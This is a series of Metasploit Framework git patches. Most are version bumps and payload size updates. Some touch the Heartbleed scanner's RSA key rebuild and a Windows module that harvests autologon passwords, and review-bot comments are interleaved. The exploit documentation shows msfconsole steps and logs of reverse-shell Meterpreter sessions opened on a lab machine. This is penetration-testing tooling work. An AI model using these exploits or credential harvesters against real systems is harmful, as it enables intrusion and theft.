+++ b/lib/rex/post/hwbridge/ui/console/command_dispatcher/rftransceiver.rb 
@@ -34,7 +34,7 @@ class Console::CommandDispatcher::RFtransceiver 'deviation' => 'sets the deviation', 'sync_word' => 'sets the sync word', 'preamble' => 'sets the preamble number', - 'lowball' => 'sets lowball' + 'lowball' => 'sets lowball', 'power' => 'sets the power level', 'maxpower' => 'sets max power' } From 50474a1ea7b93fa09373699753dae783970ab31d Mon Sep 17 00:00:00 2001 From: Metasploit Date: Fri, 21 Jul 2017 10:03:44 -0700 Subject: [PATCH 53/63] Bump version of framework to 4.15.4 --- Gemfile.lock | 10 +++++----- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 6 insertions(+), 6 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index cbe79418fc..e45c930d3e 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,7 +13,7 @@ GIT PATH remote: . specs: - metasploit-framework (4.15.3) + metasploit-framework (4.15.4) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -128,13 +128,13 @@ GEM factory_girl_rails (4.8.0) factory_girl (~> 4.8.0) railties (>= 3.0.0) - faraday (0.12.1) + faraday (0.12.2) multipart-post (>= 1.2, < 3) filesize (0.1.1) fivemat (1.3.5) google-protobuf (3.3.0) - googleauth (0.5.1) - faraday (~> 0.9) + googleauth (0.5.2) + faraday (~> 0.12) jwt (~> 1.4) logging (~> 2.0) memoist (~> 0.12) @@ -192,7 +192,7 @@ GEM metasploit_payloads-mettle (0.1.14) method_source (0.8.2) mini_portile2 (2.2.0) - minitest (5.10.2) + minitest (5.10.3) msgpack (1.1.0) multi_json (1.12.1) multipart-post (2.0.0) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index 712ec5a517..f068d52e15 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ module Metasploit end end - VERSION = "4.15.3" + VERSION = "4.15.4" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From 5d04775f5ec6adeff5fa48bb409a72f6ee7496d6 Mon Sep 17 00:00:00 2001 
From: Evgeny Naumov Date: Fri, 21 Jul 2017 16:28:07 -0400 Subject: [PATCH 54/63] use 2.4 OpenSSL::PKey::RSA api --- .../scanner/ssl/openssl_heartbleed.rb | 20 +++++++++---------- 1 file changed, 10 insertions(+), 10 deletions(-) diff --git a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb index a1182e221a..f88d51f105 100644 --- a/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb +++ b/modules/auxiliary/scanner/ssl/openssl_heartbleed.rb @@ -631,19 +631,19 @@ class MetasploitModule < Msf::Auxiliary def key_from_pqe(p, q, e) # Returns an RSA Private Key from Factors key = OpenSSL::PKey::RSA.new() + key.set_factors(p, q) - key.p = p - key.q = q - - key.n = key.p*key.q - key.e = e - + n = key.p * key.q phi = (key.p - 1) * (key.q - 1 ) - key.d = key.e.mod_inverse(phi) + d = OpenSSL::BN.new(e).mod_inverse(phi) - key.dmp1 = key.d % (key.p - 1) - key.dmq1 = key.d % (key.q - 1) - key.iqmp = key.q.mod_inverse(key.p) + key.set_key(n, e, d) + + dmp1 = key.d % (key.p - 1) + dmq1 = key.d % (key.q - 1) + iqmp = key.q.mod_inverse(key.p) + + key.set_crt_params(dmp1, dmq1, iqmp) return key end From b4bb384577329eaf363a19d54510d9a61d2e296e Mon Sep 17 00:00:00 2001 From: Christian Mehlmauer Date: Sat, 22 Jul 2017 18:54:36 +0200 Subject: [PATCH 55/63] add @pbarry-r7 's feedback --- modules/post/windows/gather/credentials/windows_autologin.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/credentials/windows_autologin.rb b/modules/post/windows/gather/credentials/windows_autologin.rb index 2ef17660bf..6384e5786a 100644 --- a/modules/post/windows/gather/credentials/windows_autologin.rb +++ b/modules/post/windows/gather/credentials/windows_autologin.rb 
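Review bot: `set_factors`, `set_key` and `set_crt_params` exist only in the openssl gem 2.0 API that ships with Ruby 2.4, so on a Ruby 2.3 install key_from_pqe now raises NoMethodError and the key-reconstruction path of the scanner is lost entirely, with no fallback to the old writable accessors. Since the commit only states the new API is used, a `respond_to?(:set_key)` guard keeps both generations working; p and q are presumably already OpenSSL::BN here, as `q.mod_inverse(p)` is called on them, so the arithmetic can be done once up front and assigned through whichever API is present.
```ruby
  def key_from_pqe(p, q, e)
    # Returns an RSA Private Key from Factors
    n = p * q
    phi = (p - 1) * (q - 1)
    d = OpenSSL::BN.new(e).mod_inverse(phi)
    dmp1 = d % (p - 1)
    dmq1 = d % (q - 1)
    iqmp = q.mod_inverse(p)

    key = OpenSSL::PKey::RSA.new
    if key.respond_to?(:set_key)
      # openssl gem >= 2.0 (Ruby 2.4): key fields are no longer writable
      key.set_factors(p, q)
      key.set_key(n, e, d)
      key.set_crt_params(dmp1, dmq1, iqmp)
    else
      key.p, key.q, key.n, key.e, key.d = p, q, n, e, d
      key.dmp1, key.dmq1, key.iqmp = dmp1, dmq1, iqmp
    end
    key
  end
```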
@@ -56,13 +56,13 @@ class MetasploitModule < Msf::Post du2 = registry_getvaldata(logon_key, "AltDefaultUserName") || '' dp2 = registry_getvaldata(logon_key, "AltDefaultPassword") || '' - if do1 != '' && du1 != '' && dp1 == '' + if do1 != '' && du1 != '' && (dp1 != '' || (dp1 == '' && al == '1')) has_al = 1 creds << [du1, dp1, do1] print_good("AutoAdminLogon=#{al}, DefaultDomain=#{do1}, DefaultUser=#{du1}, DefaultPassword=#{dp1}") end - if do2 != '' && du2 != '' && dp2 == '' + if do2 != '' && du2 != '' && (dp2 != '' || (dp2 == '' && al == '1')) has_al = 1 creds << [du2, dp2, do2] print_good("AutoAdminLogon=#{al}, AltDomain=#{do2}, AltUser=#{du2}, AltPassword=#{dp2}") From 072b0dc90b08ff6b9104aea8036d8d669ade131e Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 23 Jul 2017 05:09:01 -0700 Subject: [PATCH 56/63] Hide errors in Windows Meterpreter sessions In Windows Meterpreter sessions, set newly created threads via SetThreadErrorMode to not display error popups when there are failures. --- Gemfile.lock | 4 ++-- metasploit-framework.gemspec | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index e45c930d3e..ba7f163ef0 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -28,7 +28,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.2.37) + metasploit-payloads (= 1.2.38) metasploit_data_models metasploit_payloads-mettle (= 0.1.14) msgpack @@ -178,7 +178,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.2.37) + metasploit-payloads (1.2.38) metasploit_data_models (2.0.15) activerecord (~> 4.2.6) activesupport (~> 4.2.6) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 68cdb6e924..ca457363be 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec 
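Review bot: The restored condition `(dp1 != '' || (dp1 == '' && al == '1'))` is logically the same as `(dp1 != '' || al == '1')`, since the inner `dp1 == ''` is already implied by the first alternative being false; `if do1 != '' && du1 != '' && (dp1 != '' || al == '1')` reads more clearly, and likewise for the Alt block. The two blocks are otherwise identical apart from the three registry value names, so a small private helper taking domain, user, password and a label would remove the duplication. The enclosing `run` method continues outside the hunk.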
@@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.2.37' + spec.add_runtime_dependency 'metasploit-payloads', '1.2.38' # Needed for the next-generation POSIX Meterpreter spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.14' # Needed by msfgui and other rpc components From 302b66c2d816e7ee3d67513d72a1e21773374f67 Mon Sep 17 00:00:00 2001 From: Brent Cook Date: Sun, 23 Jul 2017 05:26:59 -0700 Subject: [PATCH 57/63] add payloads support for OSX with python meterpreter --- Gemfile.lock | 6 +++--- metasploit-framework.gemspec | 2 +- 2 files changed, 4 insertions(+), 4 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index ba7f163ef0..afcbb6f3ac 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -28,7 +28,7 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.2.38) + metasploit-payloads (= 1.2.39) metasploit_data_models metasploit_payloads-mettle (= 0.1.14) msgpack @@ -178,7 +178,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.2.38) + metasploit-payloads (1.2.39) metasploit_data_models (2.0.15) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -377,4 +377,4 @@ DEPENDENCIES yard BUNDLED WITH - 1.15.2 + 1.15.3 diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index ca457363be..97808b0d87 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec 
@@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
 # are needed when there's no database
 spec.add_runtime_dependency 'metasploit-model'
 # Needed for Meterpreter
- spec.add_runtime_dependency 'metasploit-payloads', '1.2.38'
+ spec.add_runtime_dependency 'metasploit-payloads', '1.2.39'
 # Needed for the next-generation POSIX Meterpreter
 spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.14'
 # Needed by msfgui and other rpc components
From 399557124f8c4d18da7767349138e1f27f0b0281 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Sun, 23 Jul 2017 05:28:32 -0700
Subject: [PATCH 58/63] update payload cached sizes
---
 modules/payloads/singles/python/meterpreter_bind_tcp.rb | 2 +-
 modules/payloads/singles/python/meterpreter_reverse_http.rb | 2 +-
 modules/payloads/singles/python/meterpreter_reverse_https.rb | 2 +-
 modules/payloads/singles/python/meterpreter_reverse_tcp.rb | 2 +-
 4 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb
index ee86217655..c8fa1fed85 100644
--- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python'
 module MetasploitModule
- CachedSize = 54142
+ CachedSize = 54362
 include Msf::Payload::Single
 include Msf::Payload::Python
diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb
index f02d2fdf6d..dc203b91f5 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python'
 module MetasploitModule
- CachedSize = 54106
+ CachedSize = 54326
 include Msf::Payload::Single
 include Msf::Payload::Python
diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb
index 3ae37a307f..912b05a0ef 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python'
 module MetasploitModule
- CachedSize = 54106
+ CachedSize = 54326
 include Msf::Payload::Single
 include Msf::Payload::Python
diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
index 1e7bab7e11..7f826c79a4 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python'
 module MetasploitModule
- CachedSize = 54058
+ CachedSize = 54278
 include Msf::Payload::Single
 include Msf::Payload::Python
From b75530b978885890c3f9b0e32c1892a639971600 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Sun, 23 Jul 2017 05:38:06 -0700
Subject: [PATCH 59/63] Fix an issue where 'sleep' with Python Meterpreter appears to fail.
---
 Gemfile.lock | 4 ++--
 metasploit-framework.gemspec | 2 +-
 modules/payloads/singles/python/meterpreter_bind_tcp.rb | 2 +-
 modules/payloads/singles/python/meterpreter_reverse_http.rb | 2 +-
 modules/payloads/singles/python/meterpreter_reverse_https.rb | 2 +-
 modules/payloads/singles/python/meterpreter_reverse_tcp.rb | 2 +-
 6 files changed, 7 insertions(+), 7 deletions(-)
diff --git a/Gemfile.lock b/Gemfile.lock
index afcbb6f3ac..dd54c9a15e 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -28,7 +28,7 @@ PATH
 metasploit-concern
 metasploit-credential
 metasploit-model
- metasploit-payloads (= 1.2.39)
+ metasploit-payloads (= 1.2.40)
 metasploit_data_models
 metasploit_payloads-mettle (= 0.1.14)
 msgpack
@@ -178,7 +178,7 @@ GEM
 activemodel (~> 4.2.6)
 activesupport (~> 4.2.6)
 railties (~> 4.2.6)
- metasploit-payloads (1.2.39)
+ metasploit-payloads (1.2.40)
 metasploit_data_models (2.0.15)
 activerecord (~> 4.2.6)
 activesupport (~> 4.2.6)
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 97808b0d87..0710afa5cc 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
 # are needed when there's no database
 spec.add_runtime_dependency 'metasploit-model'
 # Needed for Meterpreter
- spec.add_runtime_dependency 'metasploit-payloads', '1.2.39'
+ spec.add_runtime_dependency 'metasploit-payloads', '1.2.40'
 # Needed for the next-generation POSIX Meterpreter
 spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.14'
 # Needed by msfgui and other rpc components
diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb
index c8fa1fed85..caab279006 100644
--- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb
+++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python'
 module MetasploitModule
- CachedSize = 54362
+ CachedSize = 54590
 include Msf::Payload::Single
 include Msf::Payload::Python
diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb
index dc203b91f5..c623350dfa 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_http.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python'
 module MetasploitModule
- CachedSize = 54326
+ CachedSize = 54554
 include Msf::Payload::Single
 include Msf::Payload::Python
diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb
index 912b05a0ef..f7b3f04a69 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_https.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python'
 module MetasploitModule
- CachedSize = 54326
+ CachedSize = 54554
 include Msf::Payload::Single
 include Msf::Payload::Python
diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
index 7f826c79a4..e4294dcb6f 100644
--- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_python'
 module MetasploitModule
- CachedSize = 54278
+ CachedSize = 54506
 include Msf::Payload::Single
 include Msf::Payload::Python
From 7c55cdc1c8f690c39a443b61c281ba498b1cc5c8 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Sun, 23 Jul 2017 07:46:52 -0700
Subject: [PATCH 60/63] fix some module documentation
3 modules got documentation landed in the wrong spot. This also fixes a few typos and improves formatting.
---
 .../windows/http/easychatserver_seh.md | 24 +++++++++----------
 .../windows/http/easyfilesharing_post.md | 22 ++++++++---------
 .../post/windows/manage/archmigrate.md | 13 ++++++----
 3 files changed, 31 insertions(+), 28 deletions(-)
 rename {modules/exploits => documentation/modules/exploit}/windows/http/easychatserver_seh.md (66%)
 rename {modules/exploits => documentation/modules/exploit}/windows/http/easyfilesharing_post.md (73%)
 rename {modules => documentation/modules}/post/windows/manage/archmigrate.md (87%)
diff --git a/modules/exploits/windows/http/easychatserver_seh.md b/documentation/modules/exploit/windows/http/easychatserver_seh.md similarity index 66% rename from modules/exploits/windows/http/easychatserver_seh.md rename to documentation/modules/exploit/windows/http/easychatserver_seh.md index eaf8a0744f..915985d6e7 100644 --- a/modules/exploits/windows/http/easychatserver_seh.md +++ b/documentation/modules/exploit/windows/http/easychatserver_seh.md @@ -1,16 +1,16 @@ ## Description -This module exploits a vulnerability in the EFS Easy Chat Server application, from version 2 to 3.1, affecting the username parameter in Registration page 'register.ghp', which is prone to a stack overflow vulnerability. +This module exploits a vulnerability in the EFS Easy Chat Server application versions 2 through 3.1. The username parameter in the Registration page 'register.php', which is prone to a stack overflow vulnerability. -This module allows a remote attacker to get a payload executed under the context of the user running the Easy Chat Server application +This module allows a remote attacker to execute a payload under the context of the user running the Easy Chat Server application ## Vulnerable Application -[Easy Chat Server](http://echatserver.com/) Easy Chat Server is a easy, fast and affordable way to host and manage real-time communication software. +[Easy Chat Server](http://echatserver.com/) Easy Chat Server is an easy, fast and affordable way to host and manage real-time communication software. This module has been tested successfully on -* Easy Chat Server 3.1 on Windows XP En SP3 + * Easy Chat Server 3.1 on Windows XP En SP3 Installers: 
@@ -18,11 +18,11 @@ Installers: ## Verification Steps -1. Start `msfconsole` -2. Do: `use exploits/windows/http/easychatserver_seh` -3. Do: `set rhosts [IP]` -4. Do: `exploit` -5. You should get your payload executed + 1. Start `msfconsole` + 2. Do: `use exploits/windows/http/easychatserver_seh` + 3. Do: `set rhosts [IP]` + 4. Do: `exploit` + 5. You should get your payload executed ## Scenarios @@ -32,11 +32,11 @@ msf > use exploit/windows/http/easychatserver_seh msf exploit(easychatserver_seh) > set RHOST 192.168.56.101 RHOST => 192.168.56.101 msf exploit(easychatserver_seh) > exploit - + [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Sending stage (957487 bytes) to 192.168.56.101 [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200 - + meterpreter > sysinfo Computer : MM-8B040C5B05D9 OS : Windows XP (Build 2600, Service Pack 3). @@ -47,7 +47,7 @@ Logged On Users : 2 Meterpreter : x86/windows meterpreter > exit [*] Shutting down Meterpreter... - + [*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit msf exploit(easychatserver_seh) > ``` diff --git a/modules/exploits/windows/http/easyfilesharing_post.md b/documentation/modules/exploit/windows/http/easyfilesharing_post.md similarity index 73% rename from modules/exploits/windows/http/easyfilesharing_post.md rename to documentation/modules/exploit/windows/http/easyfilesharing_post.md index 7c2a50d2fe..92798f84fd 100644 --- a/modules/exploits/windows/http/easyfilesharing_post.md +++ b/documentation/modules/exploit/windows/http/easyfilesharing_post.md 
@@ -1,8 +1,8 @@ ## Description -This module exploits a vulnerability in the Easy File Sharing Web Server application, by exploiting an overflow in the Email Post parameter, through DEP bypass via ROP chain. +This module exploits a vulnerability in the Easy File Sharing Web Server application. It uses an overflow in the Email Post parameter, bypassing DEP via a ROP chain. -This module allows a remote attacker to get a payload executed under the context of the user running the Easy File Sharing application +This module allows a remote attacker to execute a payload under the context of the user running the Easy File Sharing application ## Vulnerable Application @@ -10,7 +10,7 @@ This module allows a remote attacker to get a payload executed under the context This module has been tested successfully on -* Easy File Sharing 7.2 on Windows XP En Sp3 + * Easy File Sharing 7.2 on Windows XP En Sp3 Installers: @@ -18,11 +18,11 @@ Installers: ## Verification Steps -1. Start `msfconsole` -2. Do: `use exploits/windows/http/easyfilesharing_post` -3. Do: `set rhosts [IP]` -4. Do: `exploit` -5. You should get your payload executed + 1. Start `msfconsole` + 2. Do: `use exploits/windows/http/easyfilesharing_post` + 3. Do: `set rhosts [IP]` + 4. Do: `exploit` + 5. You should get your payload executed ## Scenarios @@ -32,11 +32,11 @@ msf > use exploit/windows/http/easyfilesharing_post msf exploit(easyfilesharing_post) > set RHOST 192.168.56.101 RHOST => 192.168.56.101 msf exploit(easyfilesharing_post) > exploit - + [*] Started reverse TCP handler on 192.168.56.1:4444 [*] Sending stage (957487 bytes) to 192.168.56.101 [*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1253) at 2017-06-17 22:45:34 +0200 - + meterpreter > sysinfo Computer : MM OS : Windows XP (Build 2600, Service Pack 3). 
@@ -47,7 +47,7 @@ Logged On Users : 2 Meterpreter : x86/windows meterpreter > exit [*] Shutting down Meterpreter... - + [*] 192.168.56.101 - Meterpreter session 1 closed. Reason: User exit msf exploit(easyfilesharing_post) > ``` diff --git a/modules/post/windows/manage/archmigrate.md b/documentation/modules/post/windows/manage/archmigrate.md similarity index 87% rename from modules/post/windows/manage/archmigrate.md rename to documentation/modules/post/windows/manage/archmigrate.md index 0b67c71ce2..dc0e4aefda 100644 --- a/modules/post/windows/manage/archmigrate.md +++ b/documentation/modules/post/windows/manage/archmigrate.md @@ -1,5 +1,6 @@ ## Creating A Testing Environment - To use this module you need an x86 executable type meterpreter on a x64 windows machine. + +To use this module you need an x86 executable type meterpreter on a x64 windows machine. This module has been tested against: @@ -23,9 +24,10 @@ This module was not tested against, but may work against: ### Windows 10 x64 +``` msf exploit(handler) > run - [*] Started reverse TCP handler on :4567 + [*] Started reverse TCP handler on :4567 [*] Starting the payload handler... [*] Sending stage (957487 bytes) to [*] Meterpreter session 1 opened (:4567 -> :50917) at 2017-03-22 11:43:42 -0500 @@ -39,8 +41,8 @@ This module was not tested against, but may work against: Logged On Users : 2 Meterpreter : x86/windows meterpreter > background - [*] Backgrounding session 1... - msf exploit(handler) > use post/windows/manage/archmigrate + [*] Backgrounding session 1... + msf exploit(handler) > use post/windows/manage/archmigrate msf post(archmigrate) > set session 1 session => 1 msf post(archmigrate) > run @@ -70,4 +72,5 @@ This module was not tested against, but may work against: System Language : en_US Domain : WORKGROUP Logged On Users : 2 - Meterpreter : x64/windows \ No newline at end of file + Meterpreter : x64/windows +``` From 85e9be0705ad77aec8af14837084c5697b9810b0 Mon Sep 17 00:00:00 2001 
From: Brent Cook
Date: Sun, 23 Jul 2017 12:13:15 -0700
Subject: [PATCH 61/63] only pin rb-readline on linux/osx
---
 Gemfile | 4 +++-
 1 file changed, 3 insertions(+), 1 deletion(-)
diff --git a/Gemfile b/Gemfile
index 26b82335ed..482db1e239 100755
--- a/Gemfile
+++ b/Gemfile
@@ -6,8 +6,10 @@ gemspec name: 'metasploit-framework'
 # These pull in pre-release gems in order to fix specific issues.
 # XXX https://github.com/alexdalitz/dnsruby/pull/134
 gem 'dnsruby', git: 'https://github.com/alexdalitz/dnsruby'
+
 # XXX https://github.com/ConnorAtherton/rb-readline/commit/fd882edcd145c26681f9971be5f6675c7f6d1970
-gem 'rb-readline', git: 'https://github.com/ConnorAtherton/rb-readline'
+gem 'rb-readline', git: 'https://github.com/ConnorAtherton/rb-readline' if [
+ 'x86_64-linux', 'x86-linux', 'darwin'].include?(RUBY_PLATFORM.gsub(/.*darwin.*/, 'darwin'))
 # separate from test as simplecov is not run on travis-ci
 group :coverage do
From 8444038c62f3baf94f329e09edebcc7aca33d9a6 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Sun, 23 Jul 2017 22:04:09 -0700
Subject: [PATCH 62/63] Add eval alternative to PHP Meterpreter to bypass suhosin
See https://suhosin.org/stories/index.html for more information on this system.
---
 Gemfile.lock | 4 ++--
 metasploit-framework.gemspec | 2 +-
 modules/payloads/singles/php/meterpreter_reverse_tcp.rb | 2 +-
 3 files changed, 4 insertions(+), 4 deletions(-)
diff --git a/Gemfile.lock b/Gemfile.lock
index dd54c9a15e..85d5f279b9 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -28,7 +28,7 @@ PATH
 metasploit-concern
 metasploit-credential
 metasploit-model
- metasploit-payloads (= 1.2.40)
+ metasploit-payloads (= 1.2.41)
 metasploit_data_models
 metasploit_payloads-mettle (= 0.1.14)
 msgpack
@@ -178,7 +178,7 @@ GEM
 activemodel (~> 4.2.6)
 activesupport (~> 4.2.6)
 railties (~> 4.2.6)
- metasploit-payloads (1.2.40)
+ metasploit-payloads (1.2.41)
 metasploit_data_models (2.0.15)
 activerecord (~> 4.2.6)
 activesupport (~> 4.2.6)
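Review bot: The platform gate on the new `gem 'rb-readline'` line compares `RUBY_PLATFORM` against a fixed list of three strings, which is narrower than the "linux/osx" the subject describes: 32-bit Linux builds typically report `i686-linux` rather than `x86-linux`, and `aarch64-linux` or platforms carrying a `-gnu` suffix are not matched at all, so those hosts silently fall back to the released gem. A pattern match expresses the intent directly and drops the `gsub` normalisation: `gem 'rb-readline', git: 'https://github.com/ConnorAtherton/rb-readline' if RUBY_PLATFORM =~ /linux|darwin/`. Separately, the git source still has no `ref:`, so it follows the repository's default branch and only the revision recorded in Gemfile.lock pins what gets installed; since the comment above already names commit `fd882edcd145c26681f9971be5f6675c7f6d1970`, passing it as `ref:` would pin the dependency to the reviewed fix explicitly rather than to whatever that branch holds at resolve time.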
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index 0710afa5cc..bd5adc841e 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
 # are needed when there's no database
 spec.add_runtime_dependency 'metasploit-model'
 # Needed for Meterpreter
- spec.add_runtime_dependency 'metasploit-payloads', '1.2.40'
+ spec.add_runtime_dependency 'metasploit-payloads', '1.2.41'
 # Needed for the next-generation POSIX Meterpreter
 spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.14'
 # Needed by msfgui and other rpc components
diff --git a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
index ff4f7e285a..843e01d2d4 100644
--- a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
+++ b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb
@@ -11,7 +11,7 @@ require 'msf/base/sessions/meterpreter_options'
 module MetasploitModule
- CachedSize = 27602
+ CachedSize = 27735
 include Msf::Payload::Single
 include Msf::Payload::Php::ReverseTcp
From 3bc0c18e6a2865a952740c5991e83c998e7b2ad4 Mon Sep 17 00:00:00 2001
From: Brent Cook
Date: Sun, 23 Jul 2017 22:27:42 -0700
Subject: [PATCH 63/63] Properly handle threads and window destruction, add PID logging
This pulls in https://github.com/rapid7/metasploit-payloads/pull/213 which fixes https://github.com/rapid7/metasploit-framework/issues/8608 and adds PID logging to verbose keyboard capture.
---
 Gemfile.lock | 4 ++--
 metasploit-framework.gemspec | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)
diff --git a/Gemfile.lock b/Gemfile.lock
index 85d5f279b9..da4d18f631 100644
--- a/Gemfile.lock
+++ b/Gemfile.lock
@@ -28,7 +28,7 @@ PATH
 metasploit-concern
 metasploit-credential
 metasploit-model
- metasploit-payloads (= 1.2.41)
+ metasploit-payloads (= 1.2.42)
 metasploit_data_models
 metasploit_payloads-mettle (= 0.1.14)
 msgpack
@@ -178,7 +178,7 @@ GEM
 activemodel (~> 4.2.6)
 activesupport (~> 4.2.6)
 railties (~> 4.2.6)
- metasploit-payloads (1.2.41)
+ metasploit-payloads (1.2.42)
 metasploit_data_models (2.0.15)
 activerecord (~> 4.2.6)
 activesupport (~> 4.2.6)
diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec
index bd5adc841e..e3cfbe139a 100644
--- a/metasploit-framework.gemspec
+++ b/metasploit-framework.gemspec
@@ -70,7 +70,7 @@ Gem::Specification.new do |spec|
 # are needed when there's no database
 spec.add_runtime_dependency 'metasploit-model'
 # Needed for Meterpreter
- spec.add_runtime_dependency 'metasploit-payloads', '1.2.41'
+ spec.add_runtime_dependency 'metasploit-payloads', '1.2.42'
 # Needed for the next-generation POSIX Meterpreter
 spec.add_runtime_dependency 'metasploit_payloads-mettle', '0.1.14'
 # Needed by msfgui and other rpc components